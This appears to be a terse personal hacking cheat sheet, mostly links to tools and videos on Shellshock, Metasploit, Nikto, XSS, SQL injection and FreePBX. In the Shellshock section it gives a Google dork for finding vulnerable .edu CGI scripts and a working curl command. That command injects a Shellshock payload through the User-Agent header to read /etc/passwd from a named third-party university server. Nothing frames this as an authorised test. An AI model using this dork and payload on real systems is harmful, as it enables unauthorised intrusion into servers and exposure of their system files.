Hacker

ShellShock (CVE-2014-6271)

•  https://securityblog.redhat.com/2014...ection-attack/
• https://access.redhat.com/solutions/1207723
• http://lists.centos.org/pipermail/ce...er/146099.html
   

Scanning the target with Google

inurl:cgi-bin filetype:sh site:edu

Attempt to get the username remotely

curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh

Hacking a website

• http://www.rapid7.com/products/metas...t/download.jsp
• http://www.offensive-security.com/me...AP_Web_Scanner
• http://www.youtube.com/watch?v=9rKKdmLsKVI
• http://www.youtube.com/watch?v=EYxLtSuzwDM

cd /pentest/web/nikto
perl nikto.pl -host 123.123.123.123 

Metasploit

• Nmap掃描技巧(使用metasploit)：TCP空閒掃描(TCP Idle Scan)

HTTP Method Enabled

• http://www.metasploit.com/modules/au.../http/http_put
• http://www.youtube.com/watch?v=Pb6Nd7Cl5XM
• http://portswigger.net/burp/

XSS - Cross-Site Scripting

• http://www.youtube.com/watch?feature...v=WZCXIrW0xZ0#!
• http://www.hackersonlineclub.com/cro...-scripting-xss
• http://www.youtube.com/watch?v=wzbMU97ed1E
• http://www.crackhackforum.com/thread-221603.html

SQL Injection

• http://resources.infosecinstitute.co...ordpress-site/
• How To Hack a WebSite Using BackTrack 5 {SqlMap}

Asterisk/FreePBX

• http://www.rebootuser.com/?p=1117